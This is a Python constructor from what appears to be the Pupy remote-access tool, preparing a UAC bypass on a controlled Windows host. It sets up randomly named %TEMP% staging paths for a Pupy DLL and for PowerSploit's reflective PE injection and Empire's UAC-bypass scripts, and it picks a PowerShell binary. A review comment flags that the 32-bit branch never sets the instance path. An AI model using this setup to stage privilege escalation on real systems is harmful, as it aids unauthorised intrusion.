def __init__(self, module, rootPupyPath):
    '''
    Store the local and remote file locations this helper works with.

    module: object whose client.conn.modules proxy is used to call os.path
        functions and read _winreg constants on the remote host, and whose
        client.desc['proc_arch'] selects the PowerShell binary.
    rootPupyPath: root of the local Pupy tree; the bundled PowerSploit and
        Empire scripts are located relative to it.

    For defenders: the remote artifacts named here are four randomly named
    files in the remote %TEMP% folder (two ending in "..txt", two in "..ps1")
    and a PowerShell binary under %SYSTEMROOT%.
    '''
    self.module = module
    self.rootPupyPath = rootPupyPath

    # Constants: PowerShell locations, relative to %SYSTEMROOT%.
    self.x86PowershellPath = "syswow64\WindowsPowerShell\\v1.0\\powershell.exe"
    self.x64PowershellPath = "system32\\WindowsPowerShell\\v1.0\\powershell.exe"

    # Remote-side modules, reached through the client connection.
    remoteModules = self.module.client.conn.modules
    remoteOsPath = remoteModules['os.path']

    def randomRemoteTempPath(extension):
        # One fresh random basename per call, joined onto the remote %TEMP%.
        # The template inserts its own "." and the extension passed in already
        # starts with ".", so the resulting names end in "..txt" / "..ps1".
        # presumably _get_candidate_names is tempfile's name generator; its
        # import is not visible in this excerpt.
        candidate = remoteOsPath.join(self.remoteTempFolder, next(_get_candidate_names()))
        return "{0}.{1}".format(candidate, extension)

    # Remote paths (environment variables are expanded on the remote host).
    self.remoteTempFolder = remoteOsPath.expandvars("%TEMP%")
    self.systemRoot = remoteOsPath.expandvars("%SYSTEMROOT%")
    self.invokeReflectivePEInjectionRemotePath = randomRemoteTempPath('.txt')
    self.mainPowershellScriptRemotePath = randomRemoteTempPath('.ps1')
    self.pupyDLLRemotePath = randomRemoteTempPath('.txt')
    self.invokeBypassUACRemotePath = randomRemoteTempPath('.ps1')

    # Local paths: two fixed-name staging files in the local temp directory,
    # plus the third-party scripts shipped under pupy/external.
    localTempDir = gettempdir()
    externalDir = os.path.join(rootPupyPath, "pupy", "external")
    self.pupyDLLLocalPath = os.path.join(localTempDir, 'dllFile.txt')
    self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(localTempDir, 'mainPowerShellScriptPrivileged.txt')
    self.invokeReflectivePEInjectionLocalPath = os.path.join(externalDir, "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
    self.invokeBypassUACLocalPath = os.path.join(externalDir, "Empire", "privesc", "Invoke-BypassUAC.ps1")

    # Others: the remote registry root constant for the current user.
    self.HKCU = remoteModules['_winreg'].HKEY_CURRENT_USER

    # Choose the PowerShell binary from the architecture string in the
    # client description.
    is64Bit = "64" in self.module.client.desc['proc_arch']
    if not is64Bit:
        # NOTE(review): this branch binds a local name only;
        # self.powershellPath is not assigned here.
        powershellPath = remoteOsPath.join(self.systemRoot, self.x86PowershellPath)
    else:
        self.powershellPath = remoteOsPath.join(self.systemRoot, self.x64PowershellPath)